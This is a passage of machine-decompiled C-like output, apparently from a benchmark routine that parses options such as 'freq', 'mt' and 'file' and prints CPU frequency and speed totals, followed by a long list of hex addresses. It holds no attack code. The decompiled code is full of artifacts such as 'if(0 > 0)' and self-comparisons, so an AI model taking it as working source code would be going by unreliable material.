																			L203:
																			( *_t1635)[4]();
																			( *_t1635)[4]();
																			goto L204;
																		}
																		__eflags = _t1437 - 4;
																		if(_t1437 >= 4) {
																			 *(_t2139 - 0x44) = _t1437 >> 1;
																		}
																		goto L203;
																	}
																	__eflags =  *(_t2139 - 0x18);
																	if( *(_t2139 - 0x18) != 0) {
																		break;
																	}
																	goto L204;
																	L332:
																	_t2122 =  *(_t2139 - 0x6c);
																	E00B2A2BA(_t1635, 0x2d,  &(( *(_t2139 - 0x2c4))[ *(_t2139 - 0x6c)]));
																	__eflags =  *(_t2139 - 0xd);
																	if( *(_t2139 - 0xd) != 0) {
																		 *( *_t1635)( *0xb8aaa8);
																		E00B2A2BA(_t1635, 0x2d, _t2122);
																	}
																	( *_t1635)[4]();
																	__eflags =  *(_t2139 - 0xd);
																	if( *(_t2139 - 0xd) != 0) {
																		L00B2DECF(_t1635, "Avr:",  *(_t2139 - 0x2c4));
																		__eflags =  *(_t2139 - 0x14);
																		_t687 = _t2139 - 0xcc;
																		 *_t687 =  *(_t2139 - 0x14) == 0;
																		__eflags =  *_t687;
																		L00B2DCEC(_t1635,  *(_t2139 + 0x17),  *(_t2139 - 0x5c),  *(_t2139 - 0x58),  *(_t2139 - 0xcc), _t2139 - 0x28c);
																		 *( *_t1635)( *0xb8aaa8);
																		L00B2DCEC(_t1635,  *(_t2139 + 0x17),  *(_t2139 - 0x5c),  *(_t2139 - 0x58),  *(_t2139 - 0xcc), _t2139 - 0x264);
																		( *_t1635)[4]();
																	}
																	L00B2DECF(_t1635, "Tot:",  *(_t2139 - 0x2c4));
																	_t1768 = 0xa;
																	_t1312 = memcpy(_t2139 - 0x324, _t2139 - 0x28c, _t1768 << 2);
																	_t2142 =  &(_t2142[3]);
																	L00B29F86(_t2139 - 0x324, _t1312);
																	_t2004 =  *(_t2139 + 0x17);
																	L00B2DCEC(_t1635,  *(_t2139 + 0x17),  *(_t2139 - 0x5c),  *(_t2139 - 0x58), 0, _t2139 - 0x324);
																	( *_t1635)[4]();
																	 *(_t2139 - 0x18) =  *(_t2139 - 0x18) + 1;
																	__eflags =  *(_t2139 - 0x18) - 3;
																} while ( *(_t2139 - 0x18) < 3);
																E00B20C00(_t2139 - 0x11c);
																L00B298A1(_t2139 - 0x30);
																_t2101 = 0;
																goto L483;
															}
															L191:
															 *(_t2139 - 0x14) = 1;
															goto L192;
														}
														 *(_t2139 - 0xf) = 1;
														E00B1275A(_t2139 - 0xe4, 0xb89390);
														goto L191;
													}
												} else {
													 *(_t2139 - 0x130) =  *(_t2139 - 0x130) & 0x00000000;
													 *((intOrPtr*)(_t2139 - 0x120)) = 0;
													L00B27CD5(_t1123, _t2139 - 0x130);
													_t1127 = L00B1DC4A(_t2139 - 0xf0, __eflags);
													__eflags =  *(_t2139 - 0xe);
													if(__eflags == 0) {
														__eflags = 0;
														_t386 = _t1127 + 0x10000; // 0x10000
														_t1861 = _t386;
														if(0 > 0) {
															L175:
															_push(_t2139 - 0x130);
															_push( *(_t2139 - 0x1c));
															_push(_t1635);
															_push(0x20);
															_push( *(_t2139 - 0x30));
															_push(_t1861);
															_push(_t2139 - 0xf0);
															_push(_t2139 - 0x1a0);
															_push( *(_t2139 - 0x7c));
															_push( *(_t2139 - 0x80));
															_t1127 = E00B2CDBD(1,  *(_t2139 - 0x4c), __eflags);
															L176:
															_t2101 = _t1127;
															L479:
															_push( *((intOrPtr*)(_t2139 - 0x11c)));
															L480:
															E00B11E89(_t1127);
															goto L482;
														}
														if(0 < 0) {
															L180:
															_t2101 = 0x80070057;
															goto L479;
														}
														__eflags = _t1861 - _t1127;
														if(__eflags >= 0) {
															goto L175;
														}
														goto L180;
													}
													_t1861 =  *(_t2139 - 0x2c);
													goto L175;
												}
											}
											_t1454 = L00B1DC9D(_t2139 - 0xf0, __eflags, _t2139 - 0x68);
											__eflags = _t1454;
											if(__eflags != 0) {
												goto L169;
											}
											 *(_t2139 + 0xb) =  *(_t2139 + 0xb) & _t1454;
											goto L170;
										}
										__eflags = _t1635;
										if(_t1635 != 0) {
											( *_t1635)[4]();
											L135:
											_t1873 =  *(_t2139 - 0x4c);
											_t1469 =  *(_t2139 - 0x34) >> 1;
											__eflags = _t1873 - _t1469;
											 *(_t2139 + 8) = _t1469;
											if(_t1873 < _t1469) {
												 *(_t2139 + 8) = _t1873;
											}
											_t1470 = 1;
											__eflags =  *(_t2139 + 8) - _t1470;
											if( *(_t2139 + 8) < _t1470) {
												 *(_t2139 + 8) = _t1470;
											}
											__eflags = _t1635;
											if(_t1635 != 0) {
												L00B11944(_t2139 - 0x3a4,  *(_t2139 + 8), 0);
												 *( *_t1635)(_t2139 - 0x3a4);
												 *( *_t1635)("T CPU Freq (MHz):");
											}
											 *(_t2139 - 0x88) = 0;
											__eflags =  *(_t2139 - 0x78) |  *(_t2139 - 0x74);
											_t2073 = 0x400;
											if(( *(_t2139 - 0x78) |  *(_t2139 - 0x74)) != 0) {
												while(1) {
													_t1489 = L00B7F440(_t2073,  *(_t2139 - 0x88), 0xf4240, 0);
													__eflags =  *(_t2139 - 0x74) - _t1973;
													if(__eflags > 0) {
														goto L148;
													}
													if(__eflags < 0) {
														L145:
														_t1973 =  *(_t2139 - 0x88);
														_t1883 = 1;
														_t1491 = L00B7F400(_t2073, _t1883, _t1973);
														__eflags = _t1973;
														_t2073 = _t1491;
														 *(_t2139 - 0x88) = _t1973;
														if(__eflags > 0) {
															continue;
														}
														if(__eflags < 0) {
															while(1) {
																L148:
																__eflags = _t1635;
																if(_t1635 == 0) {
																	goto L150;
																}
																_t1476 = ( *_t1635)[8]();
																__eflags = _t1476;
																if(_t1476 != 0) {
																	L159:
																	_t2101 = _t1476;
																	goto L482;
																}
																L150:
																 *(_t2139 - 0x178) = L00B7F440(_t2073,  *(_t2139 - 0x88), 0xf4240, 0);
																 *(_t2139 - 0x164) =  *(_t2139 - 0x164) & 0x00000000;
																 *(_t2139 - 0x170) =  *(_t2139 + 8);
																_push(_t2139 - 0x1a0);
																_push(0);
																 *(_t2139 - 0x174) = _t1973;
																 *(_t2139 - 0x16c) = 1;
																 *(_t2139 - 0x168) = 1;
																_t1476 = E00B2A544(_t2139 - 0x178, _t2149);
																__eflags = _t1476;
																if(_t1476 != 0) {
																	goto L159;
																}
																__eflags =  *(_t2139 + 0x14) - _t1476;
																if( *(_t2139 + 0x14) == _t1476) {
																	L153:
																	__eflags = _t1635;
																	if(_t1635 != 0) {
																		_t2059 = 3;
																		E00B2A421(_t1635, _t2059,  *((intOrPtr*)(_t2139 - 0x158)),  *((intOrPtr*)(_t2139 - 0x154)));
																		 *( *_t1635)("%");
																		_t1484 = L00B7F310( *(_t2139 - 0x160),  *(_t2139 - 0x15c), 0xf4240, 0);
																		__eflags = 0;
																		E00B2A24D(_t1635, 0, 0, _t1484, _t2059);
																		 *( *_t1635)("  ");
																	}
																	__eflags =  *(_t2139 - 0x88);
																	if(__eflags > 0) {
																		L160:
																		__eflags =  *(_t2139 + 0x14);
																		if( *(_t2139 + 0x14) == 0) {
																			goto L162;
																		}
																		_t1476 =  *((intOrPtr*)( *( *(_t2139 + 0x14)) + 4))( *(_t2139 + 8));
																		__eflags = _t1476;
																		if(_t1476 != 0) {
																			goto L159;
																		}
																		goto L162;
																	} else {
																		if(__eflags < 0) {
																			L158:
																			_t1973 =  *(_t2139 - 0x88);
																			_t1876 = 1;
																			_t2073 = L00B7F480(_t2073, _t1876, _t1973);
																			 *(_t2139 - 0x88) = _t1973;
																			continue;
																		}
																		__eflags = _t2073 - 0x800;
																		if(_t2073 >= 0x800) {
																			goto L160;
																		}
																		goto L158;
																	}
																}
																_t1476 =  *((intOrPtr*)( *( *(_t2139 + 0x14))))( *(_t2139 + 8),  *(_t2139 - 0x160),  *(_t2139 - 0x15c),  *((intOrPtr*)(_t2139 - 0x158)),  *((intOrPtr*)(_t2139 - 0x154)));
																__eflags = _t1476;
																if(_t1476 != 0) {
																	goto L159;
																}
																goto L153;
															}
														}
														__eflags = _t2073 - 1;
														if(_t2073 > 1) {
															continue;
														}
														goto L148;
													}
													__eflags =  *(_t2139 - 0x78) - _t1489;
													if( *(_t2139 - 0x78) >= _t1489) {
														goto L148;
													}
													goto L145;
												}
											}
											goto L148;
										}
										__eflags =  *(_t2139 + 0x14);
										if( *(_t2139 + 0x14) == 0) {
											goto L164;
										}
										goto L135;
									}
									_t2073 = 0;
									__eflags = 0;
									L87:
									 *(_t2139 - 0x9c) = 0x40;
									__eflags =  *(_t2139 - 0x78) |  *(_t2139 - 0x74);
									 *(_t2139 - 0x98) = _t2073;
									if(( *(_t2139 - 0x78) |  *(_t2139 - 0x74)) == 0) {
										L94:
										 *(_t2139 - 0x6c) = _t2073;
										while(1) {
											__eflags = _t1635 - _t2073;
											if(_t1635 == _t2073) {
												goto L97;
											}
											_t1640 = _t1635;
											_t1476 = ( *_t1635)[8]();
											__eflags = _t1476 - _t2073;
											if(_t1476 != _t2073) {
												goto L159;
											}
											L97:
											 *(_t2139 - 0x5c) = L00B279DF(_t1640);
											 *(_t2139 - 0x58) = _t1973;
											 *(_t2139 - 0xb8) = L00B7F440( *(_t2139 - 0x9c),  *(_t2139 - 0x98), 0xf4240, _t2073);
											 *(_t2139 - 0xb4) = _t1973;
											_push( *0xb9a464);
											_t1888 = 7;
											_t1501 = L00B7F400(_t1500, _t1888, _t1973);
											_t1640 =  *(_t2139 - 0x5c);
											_t1973 = _t1501;
											_t1502 = E00B2A87C( *(_t2139 - 0x5c), _t1973);
											__eflags = _t1502 - 0xf1541213;
											if(_t1502 == 0xf1541213) {
												__eflags = _t1635 - _t2073;
												if(_t1635 != _t2073) {
													_t1640 = _t1635;
													 *( *_t1635)(0xb89b34);
												}
											}
											_t1503 = L00B279DF(_t1640);
											_t2098 = _t1973;
											_t2132 = _t1503 -  *(_t2139 - 0x5c);
											asm("sbb edi, [ebp-0x58]");
											 *(_t2139 - 0x5c) = _t2132;
											__eflags = _t2132 | _t2098;
											 *(_t2139 - 0x58) = _t2098;
											if((_t2132 | _t2098) == 0) {
												_t236 = _t2139 - 0x58;
												 *_t236 =  *(_t2139 - 0x58) & 0x00000000;
												__eflags =  *_t236;
												 *(_t2139 - 0x5c) = 1;
											}
											__eflags =  *(_t2139 - 0x58) - 0x20000000;
											if(__eflags < 0) {
												L106:
												 *(_t2139 - 0x54) = L00B27A04(_t1640);
												 *(_t2139 - 0x50) = _t1973;
												 *(_t2139 - 0x8c) = L00B27CA4(_t1640, _t2149,  *(_t2139 - 0xb8),  *(_t2139 - 0xb4), _t1506, _t1973,  *(_t2139 - 0x5c),  *(_t2139 - 0x58));
												 *(_t2139 - 0x88) = _t1973;
												_t1509 = L00B7F310(L00B7F440( *(_t2139 - 0x54),  *(_t2139 - 0x50),  *(_t2139 - 0x9c),  *(_t2139 - 0x98)), _t1973,  *(_t2139 - 0x5c),  *(_t2139 - 0x58));
												__eflags = _t1635;
												 *((intOrPtr*)(_t2139 - 0x104)) = _t1509;
												 *(_t2139 - 0x100) = _t1973;
												if(_t1635 != 0) {
													__eflags = _t2132 | _t2098;
													if(__eflags != 0) {
														_t1640 = _t1635;
														_t1973 = 5;
														E00B2A24D(_t1635, _t1973, __eflags,  *((intOrPtr*)(_t2139 - 0x104)),  *(_t2139 - 0x100));
													} else {
														_t1640 = _t1635;
														 *( *_t1635)(" -");
													}
												}
												_t2133 =  *(_t2139 + 0x14);
												_t2073 = 0;
												__eflags = _t2133;
												if(_t2133 == 0) {
													L112:
													__eflags =  *(_t2139 - 0x6c) - 1;
													if( *(_t2139 - 0x6c) < 1) {
														L127:
														 *(_t2139 - 0x6c) =  *(_t2139 - 0x6c) + 1;
														_t2073 = 0;
														continue;
													}
													__eflags =  *(_t2139 - 0x98) - _t2073;
													if( *(_t2139 - 0x98) > _t2073) {
														L115:
														 *(_t2139 + 0xb) = 1;
														L117:
														_t1511 = L00B7F440( *(_t2139 - 0x54),  *(_t2139 - 0x50), 0x10, _t2073);
														__eflags =  *(_t2139 - 0x58) - _t1973;
														if(__eflags < 0) {
															L123:
															__eflags =  *(_t2139 - 0xd);
															if( *(_t2139 - 0xd) != 0) {
																_t1516 = L00B7F440( *((intOrPtr*)(_t2139 - 0x104)),  *(_t2139 - 0x100), 0xf4240, _t2073);
																_t1973 = 0;
																__eflags = 0;
																E00B2CCF7(0, _t1516, 0, _t2139 - 0x80);
															}
															__eflags =  *(_t2139 + 0xb);
															if( *(_t2139 + 0xb) != 0) {
																__eflags = _t2133 - _t2073;
																if(_t2133 == _t2073) {
																	goto L130;
																}
																_t1476 =  *((intOrPtr*)( *_t2133 + 4))(1);
																__eflags = _t1476 - _t2073;
																if(_t1476 != _t2073) {
																	goto L159;
																}
																goto L130;
															} else {
																_t1973 =  *(_t2139 - 0x98);
																_t1640 = 1;
																 *(_t2139 - 0x9c) = L00B7F480( *(_t2139 - 0x9c), _t1640, _t1973);
																 *(_t2139 - 0x98) = _t1973;
																goto L127;
															}
														}
														if(__eflags > 0) {
															L120:
															 *( *_t1635)(" (Cmplx)");
															__eflags = _t2133 - _t2073;
															if(_t2133 == _t2073) {
																 *(_t2139 - 0xd) = 1;
															}
															 *(_t2139 + 0xb) = 1;
															goto L123;
														}
														__eflags =  *(_t2139 - 0x5c) - _t1511;
														if( *(_t2139 - 0x5c) < _t1511) {
															goto L123;
														}
														goto L120;
													}
													__eflags =  *(_t2139 - 0x9c) - 0x800;
													if( *(_t2139 - 0x9c) < 0x800) {
														_t269 = _t2139 + 0xb;
														 *_t269 =  *(_t2139 + 0xb) & 0x00000000;
														__eflags =  *_t269;
														goto L117;
													}
													goto L115;
												} else {
													_t1640 = _t2133;
													_t1476 =  *((intOrPtr*)( *_t2133))(1,  *(_t2139 - 0x8c),  *(_t2139 - 0x88), 0x10000, 0);
													__eflags = _t1476;
													if(_t1476 != 0) {
														goto L159;
													}
													goto L112;
												}
											} else {
												if(__eflags > 0) {
													L105:
													_t241 = _t2139 - 0x58;
													 *_t241 =  *(_t2139 - 0x58) & 0x00000000;
													__eflags =  *_t241;
													 *(_t2139 - 0x5c) = 1;
													goto L106;
												}
												__eflags =  *(_t2139 - 0x5c);
												if( *(_t2139 - 0x5c) <= 0) {
													goto L106;
												}
												goto L105;
											}
										}
									} else {
										goto L88;
									}
									while(1) {
										L88:
										_t1526 = L00B7F440( *(_t2139 - 0x9c),  *(_t2139 - 0x98), 0xf4240, _t2073);
										__eflags =  *(_t2139 - 0x74) - _t1973;
										if(__eflags > 0) {
											goto L94;
										}
										if(__eflags < 0) {
											L91:
											_t1973 =  *(_t2139 - 0x98);
											_t1640 = 1;
											_t1528 = L00B7F400( *(_t2139 - 0x9c), _t1640, _t1973);
											__eflags = _t1973 - _t2073;
											 *(_t2139 - 0x9c) = _t1528;
											 *(_t2139 - 0x98) = _t1973;
											if(__eflags > 0) {
												continue;
											}
											if(__eflags < 0) {
												goto L94;
											}
											__eflags = _t1528 - 1;
											if(_t1528 > 1) {
												continue;
											}
											goto L94;
										}
										__eflags =  *(_t2139 - 0x78) - _t1526;
										if( *(_t2139 - 0x78) >= _t1526) {
											goto L94;
										}
										goto L91;
									}
									goto L94;
								}
								E00B126D9(_t2139 - 0x40);
								 *(_t2139 - 4) = 0xf;
								E00B1A0B6(_t2139 - 0x40, __eflags);
								 *( *_t1635)( *((intOrPtr*)(_t2139 - 0x40)));
								_t1534 = ( *_t1635)[4]();
								 *(_t2139 - 4) = 1;
								E00B11E89(_t1534,  *((intOrPtr*)(_t2139 - 0x40)));
								_t1640 = _t1635;
								 *_t2142 = "1T CPU Freq (MHz):";
								 *( *_t1635)();
								goto L87;
							} else {
								goto L14;
							}
							do {
								L14:
								_t2135 =  *((intOrPtr*)( *( *(_t2139 + 8)) +  *(_t2139 - 0x14) * 4));
								E00B12EA8(_t2139 - 0x28, __eflags, _t2135);
								E00B122CE( *(_t2139 - 0x28));
								_t1973 = "file";
								_t1127 = E00B123F5( *(_t2139 - 0x28), _t1973);
								__eflags = _t1127;
								if(_t1127 == 0) {
									 *(_t2139 - 0xb0) = _t2073;
									 *(_t2139 - 0xae) = _t2073;
									 *(_t2139 - 0xa8) = _t2073;
									__eflags =  *((intOrPtr*)(_t2135 + 0x10)) - _t2073;
									 *(_t2139 - 4) = 6;
									if( *((intOrPtr*)(_t2135 + 0x10)) != _t2073) {
										_t103 = _t2135 + 0xc; // 0xd
										E00B2E916(_t103, _t2139 - 0xb0);
									}
									_t1542 = E00B123F5( *(_t2139 - 0x28), "time");
									__eflags = _t1542;
									if(_t1542 == 0) {
										_t1543 = E00B123F5( *(_t2139 - 0x28), "timems");
										__eflags = _t1543;
										if(_t1543 == 0) {
											_t1544 = E00B123F5( *(_t2139 - 0x28), "tic");
											__eflags = _t1544;
											if(_t1544 == 0) {
												_t1545 = E00B123F5( *(_t2139 - 0x28), "df");
												__eflags = _t1545;
												if(_t1545 == 0) {
													_t1546 = E00B123F5( *(_t2139 - 0x28), "ds");
													__eflags = _t1546;
													if(_t1546 != 0) {
														goto L41;
													}
													_t1553 = E00B123F5( *(_t2139 - 0x28), "mts");
													__eflags = _t1553;
													if(_t1553 == 0) {
														_t1554 = E00B123F5( *(_t2139 - 0x28), "af");
														__eflags = _t1554;
														if(_t1554 == 0) {
															_t1973 = "freq";
															_t1555 = E00B123F5( *(_t2139 - 0x28), _t1973);
															__eflags = _t1555;
															if(_t1555 == 0) {
																_t1556 = E00B123A0(_t2139 - 0x28, "mt");
																__eflags = _t1556;
																if(_t1556 == 0) {
																	_push(_t2139 - 0xb0);
																	_push(_t2139 - 0x28);
																	_t1559 = L00B1DF13(_t2139 - 0xf0);
																	__eflags = _t1559 - _t2073;
																	if(_t1559 != _t2073) {
																		_t2101 = _t1559;
																		goto L81;
																	}
																	goto L44;
																}
																E00B12DD3(_t2139 - 0x40,  &(( *(_t2139 - 0x28))[4]));
																_t1973 = 0xb89390;
																 *(_t2139 - 4) = 0xe;
																_t1563 = E00B123F5( *((intOrPtr*)(_t2139 - 0x40)), 0xb89390);
																__eflags = _t1563;
																if(_t1563 != 0) {
																	L68:
																	_push( *((intOrPtr*)(_t2139 - 0x40)));
																	 *(_t2139 - 0x6d) = 1;
																	L69:
																	E00B11E89(_t1563);
																	goto L44;
																}
																__eflags =  *(_t2139 - 0x3c) - _t2073;
																if(__eflags != 0) {
																	L66:
																	 *(_t2139 - 0x6f) =  *(_t2139 - 0x6f) & 0x00000000;
																	 *(_t2139 - 0x4c) =  *(_t2139 - 0x34);
																	_push(_t2139 - 0x6f);
																	_push(_t2139 - 0x4c);
																	_t1973 = _t2139 - 0xb0;
																	_t2101 = L00B1D0BE(_t2139 - 0x40, _t1973, __eflags);
																	_push( *((intOrPtr*)(_t2139 - 0x40)));
																	__eflags = _t2101 - _t2073;
																	if(_t2101 != _t2073) {
																		E00B11E89(_t1563);
																		goto L81;
																	}
																	goto L69;
																}
																__eflags =  *(_t2139 - 0xb0) - 8;
																if(__eflags != 0) {
																	goto L66;
																}
																_t1973 = 0xb89390;
																__eflags = E00B123F5( *(_t2139 - 0xa8), 0xb89390);
																if(__eflags != 0) {
																	goto L68;
																}
																goto L66;
															}
															 *(_t2139 - 0x18) = _t2073;
															_t1569 = E00B12D90(_t2139 - 0xa0);
															_t1973 = _t2139 - 0xb0;
															 *(_t2139 - 4) = 0xd;
															_t2101 = L00B1D072(_t1569, _t1973, _t2139 - 0x18);
															 *(_t2139 - 4) = 6;
															E00B11E89(_t1570,  *((intOrPtr*)(_t2139 - 0xa0)));
															__eflags = _t2101 - _t2073;
															if(_t2101 != _t2073) {
																goto L81;
															}
															__eflags =  *(_t2139 - 0x18) - _t2073;
															if( *(_t2139 - 0x18) == _t2073) {
																goto L82;
															}
															_t1572 = L00B7F440( *(_t2139 - 0x18), _t2073, 0xf4240, _t2073);
															__eflags = _t1635 - _t2073;
															 *(_t2139 - 0x78) = _t1572;
															 *(_t2139 - 0x74) = _t1973;
															if(__eflags != 0) {
																 *( *_t1635)("freq=");
																_t1973 = 0;
																E00B2A24D(_t1635, 0, __eflags,  *(_t2139 - 0x18), _t2073);
																( *_t1635)[4]();
															}
															goto L44;
														}
														_t1578 = E00B12D90(_t2139 - 0x60);
														_t1973 = _t2139 - 0xb0;
														 *(_t2139 - 4) = 0xc;
														_t2101 = L00B1D072(_t1578, _t1973, _t2139 - 0x84);
														E00B11E89(_t1579,  *((intOrPtr*)(_t2139 - 0x60)));
														__eflags = _t2101 - _t2073;
														if(_t2101 != _t2073) {
															goto L81;
														} else {
															_t1581 =  *(_t2139 - 0x84);
															__eflags = _t1581 - _t2073;
															if(_t1581 > _t2073) {
																__eflags = _t1581 -  *(_t2139 - 0x34);
																if(_t1581 <  *(_t2139 - 0x34)) {
																	L00B27E47(_t2139 - 0x1a0,  *(_t2139 - 0x34), 2);
																	 *(_t2139 - 0x1a0) =  *(_t2139 - 0x84);
																}
															}
															goto L44;
														}
													}
													_t1584 = E00B12D90(_t2139 - 0xfc);
													_t1973 = _t2139 - 0xb0;
													 *(_t2139 - 4) = 0xb;
													_t2101 = L00B1D072(_t1584, _t1973, _t2139 - 0x148);
													E00B11E89(_t1585,  *((intOrPtr*)(_t2139 - 0xfc)));
													__eflags = _t2101 - _t2073;
													if(_t2101 != _t2073) {
														goto L81;
													} else {
														goto L44;
													}
												} else {
													 *(_t2139 - 0xf) = 1;
													L41:
													_t1547 = E00B12D90(_t2139 - 0x184);
													_t1973 = _t2139 - 0xb0;
													 *(_t2139 - 4) = 0xa;
													_t2101 = L00B1D072(_t1547, _t1973, _t2139 - 0x94);
													E00B11E89(_t1548,  *((intOrPtr*)(_t2139 - 0x184)));
													__eflags = _t2101 - _t2073;
													if(_t2101 != _t2073) {
														L81:
														_t1127 = L00B19312(_t2139 - 0xb0);
														L75:
														_push( *(_t2139 - 0x28));
														goto L480;
													}
													__eflags =  *(_t2139 - 0x94) - 0x20;
													if( *(_t2139 - 0x94) > 0x20) {
														L82:
														_t2101 = 0x80070057;
														goto L81;
													} else {
														 *(_t2139 - 0x6e) = 1;
														L44:
														_t1550 = L00B19312(_t2139 - 0xb0);
														goto L45;
													}
												}
											}
											_t1587 = E00B12D90(_t2139 - 0x90);
											 *(_t2139 - 4) = 9;
											_t2101 = L00B1D072(_t1587, _t2139 - 0xb0, _t2139 - 0x10c);
											E00B11E89(_t1588,  *((intOrPtr*)(_t2139 - 0x90)));
											__eflags = _t2101 - _t2073;
											if(_t2101 != _t2073) {
												goto L81;
											}
											_t1943 =  *(_t2139 - 0x10c);
											__eflags =  *(_t2139 - 0x10c) - 0x40;
											if( *(_t2139 - 0x10c) >= 0x40) {
												goto L82;
											} else {
												_t1973 = 0;
												_t1590 = 1;
												 *(_t2139 - 0x80) = L00B7F480(_t1590, _t1943, 0);
												 *(_t2139 - 0x7c) = 0;
												goto L44;
											}
										}
										_t1592 = E00B12D90(_t2139 - 0x108);
										_t1973 = _t2139 - 0xb0;
										 *(_t2139 - 4) = 8;
										_t2101 = L00B1D072(_t1592, _t1973, _t2139 - 0xc8);
										E00B11E89(_t1593,  *((intOrPtr*)(_t2139 - 0x108)));
										__eflags = _t2101 - _t2073;
										if(_t2101 != _t2073) {
											goto L81;
										} else {
											 *(_t2139 - 0xd) = 1;
											goto L44;
										}
									}
									_t1595 = E00B12D90(_t2139 - 0xbc);
									_t1973 = _t2139 - 0xb0;
									 *(_t2139 - 4) = 7;
									_t2101 = L00B1D072(_t1595, _t1973, _t2139 - 0xc8);
									E00B11E89(_t1596,  *((intOrPtr*)(_t2139 - 0xbc)));
									__eflags = _t2101 - _t2073;
									if(_t2101 != _t2073) {
										goto L81;
									} else {
										 *(_t2139 - 0xd) = 1;
										 *(_t2139 - 0xc8) =  *(_t2139 - 0xc8) * 0x3e8;
										goto L44;
									}
								}
								__eflags =  *((intOrPtr*)(_t2135 + 0x10)) - _t2073;
								if( *((intOrPtr*)(_t2135 + 0x10)) == _t2073) {
									_t2101 = 0x80070057;
									goto L75;
								}
								 *(_t2139 - 0x12c) =  *(_t2139 - 0x12c) | 0xffffffff;
								 *(_t2139 - 0x128) =  *(_t2139 - 0x128) & 0x00000000;
								 *(_t2139 - 4) = 5;
								_t1601 = L00B17860( *((intOrPtr*)(_t2135 + 0xc)));
								__eflags = _t1601;
								if(_t1601 == 0) {
									L77:
									_t2101 = L00B1729C();
									L74:
									_t1127 = E00B1736B(_t2139 - 0x12c);
									goto L75;
								}
								_t1604 = L00B1738B(_t2139 - 0x12c, _t2139 - 0x54);
								__eflags = _t1604;
								if(_t1604 == 0) {
									goto L77;
								} else {
									__eflags = _t1635 - _t2073;
									if(_t1635 != _t2073) {
										 *( *_t1635)("file size =");
										_t1973 = 0;
										__eflags = 0;
										E00B2A24D(_t1635, 0, 0,  *(_t2139 - 0x54),  *(_t2139 - 0x50));
										( *_t1635)[4]();
									}
									_t2137 =  *(_t2139 - 0x54);
									__eflags = _t2137 - _t2137;
									if(_t2137 != _t2137) {
										L73:
										_t2101 = 0x80070057;
										goto L74;
									}
									__eflags = 0 -  *(_t2139 - 0x50);
									if(0 !=  *(_t2139 - 0x50)) {
										goto L73;
									}
									E00B2848E(_t2139 - 0x30, _t2137);
									__eflags = _t2137 - _t2073;
									if(_t2137 == _t2073) {
										L24:
										 *(_t2139 - 0xe) = 1;
										_t1608 = L00B178BD(_t2139 - 0x12c,  *(_t2139 - 0x30), _t2137, _t2139 - 0x110);
										__eflags = _t1608;
										if(_t1608 == 0) {
											goto L77;
										}
										__eflags =  *(_t2139 - 0x110) - _t2137;
										if( *(_t2139 - 0x110) != _t2137) {
											_t2101 = 0x80004005;
											goto L74;
										} else {
											_t1550 = E00B1736B(_t2139 - 0x12c);
											goto L45;
										}
									}
									__eflags =  *(_t2139 - 0x30) - _t2073;
									if( *(_t2139 - 0x30) == _t2073) {
										_t2101 = 0x8007000e;
										goto L74;
									}
									goto L24;
								}
								L45:
								 *(_t2139 - 4) = 1;
								E00B11E89(_t1550,  *(_t2139 - 0x28));
								 *(_t2139 - 0x14) =  *(_t2139 - 0x14) + 1;
								_t1640 =  *(_t2139 - 0x14);
								__eflags =  *(_t2139 - 0x14) - 4[ *(_t2139 + 8)];
							} while (__eflags < 0);
							goto L83;
						}
						_t1614 =  *(_t2139 + 8);
						 *(_t2139 - 0x14) = _t2073;
						__eflags = 4[_t1614] - _t2073;
						if(4[_t1614] <= _t2073) {
							L11:
							_t1615 =  *(_t2139 + 8);
							__eflags = 4[_t1615] - _t2073;
							if(4[_t1615] != _t2073) {
								_t1640 = _t1635;
								( *_t1635)[4]();
							}
							goto L13;
						} else {
							goto L8;
						}
						do {
							L8:
							_t2138 =  *((intOrPtr*)( *( *(_t2139 + 8)) +  *(_t2139 - 0x14) * 4));
							 *( *_t1635)(" ");
							_t1622 = E00B20BAA();
							_t1973 =  *_t1635;
							 *(_t2139 - 4) = 2;
							_t1624 =  *_t1973( *_t1622);
							 *(_t2139 - 4) = 1;
							E00B11E89(_t1624,  *((intOrPtr*)(_t2139 - 0x40)));
							__eflags =  *((intOrPtr*)(_t2138 + 0x10)) - _t2073;
							if( *((intOrPtr*)(_t2138 + 0x10)) != _t2073) {
								 *( *_t1635)("=");
								_t1629 = E00B20BAA();
								_t1973 =  *_t1635;
								 *(_t2139 - 4) = 3;
								_t1631 =  *_t1973( *_t1629);
								 *(_t2139 - 4) = 1;
								E00B11E89(_t1631,  *(_t2139 - 0x28));
							}
							 *(_t2139 - 0x14) =  *(_t2139 - 0x14) + 1;
							_t1626 =  *(_t2139 + 8);
							_t1640 =  *(_t2139 - 0x14);
							__eflags =  *(_t2139 - 0x14) - 4[_t1626];
						} while ( *(_t2139 - 0x14) < 4[_t1626]);
						goto L11;
					}
					_t1633 = L00B197F8( *(_t2139 - 0x144));
					__eflags = _t1633;
					if(_t1633 == 0) {
						goto L5;
					} else {
						_t1110 = L00B197F8( *(_t2139 - 0x144));
						goto L6;
					}
				} else {
					_t1119 = 0x80004005;
					L484:
					 *[fs:0x0] =  *((intOrPtr*)(_t2139 - 0xc));
					return _t1119;
				}
			}
















































































































































































































                                                                                                                    0x00b2aa45
                                                                                                                    0x00b2aa45
                                                                                                                    0x00b2aa4a
                                                                                                                    0x00b2aa4f
                                                                                                                    0x00b2aa58
                                                                                                                    0x00b2aa5b
                                                                                                                    0x00b2aa64
                                                                                                                    0x00b2aa72
                                                                                                                    0x00b2aa74
                                                                                                                    0x00b2aa7b
                                                                                                                    0x00b2aa85
                                                                                                                    0x00b2aa8b
                                                                                                                    0x00b2aa91
                                                                                                                    0x00b2aa97
                                                                                                                    0x00b2aa9c
                                                                                                                    0x00b2aa9e
                                                                                                                    0x00b2aabc
                                                                                                                    0x00b2aabc
                                                                                                                    0x00b2aac1
                                                                                                                    0x00b2aac7
                                                                                                                    0x00b2aaca
                                                                                                                    0x00b2aacf
                                                                                                                    0x00b2aad3
                                                                                                                    0x00b2aad7
                                                                                                                    0x00b2aadb
                                                                                                                    0x00b2aae4
                                                                                                                    0x00b2aaea
                                                                                                                    0x00b2aaed
                                                                                                                    0x00b2aaf7
                                                                                                                    0x00b2ab01
                                                                                                                    0x00b2ab04
                                                                                                                    0x00b2ab07
                                                                                                                    0x00b2ab0a
                                                                                                                    0x00b2ab11
                                                                                                                    0x00b2ab17
                                                                                                                    0x00b2ab1d
                                                                                                                    0x00b2ab23
                                                                                                                    0x00b2ab29
                                                                                                                    0x00b2ab2e
                                                                                                                    0x00b2ab31
                                                                                                                    0x00b2ab34
                                                                                                                    0x00b2ab37
                                                                                                                    0x00b2ab3b
                                                                                                                    0x00b2ab3f
                                                                                                                    0x00b2ab41
                                                                                                                    0x00b2ab45
                                                                                                                    0x00b2abe2
                                                                                                                    0x00b2abe5
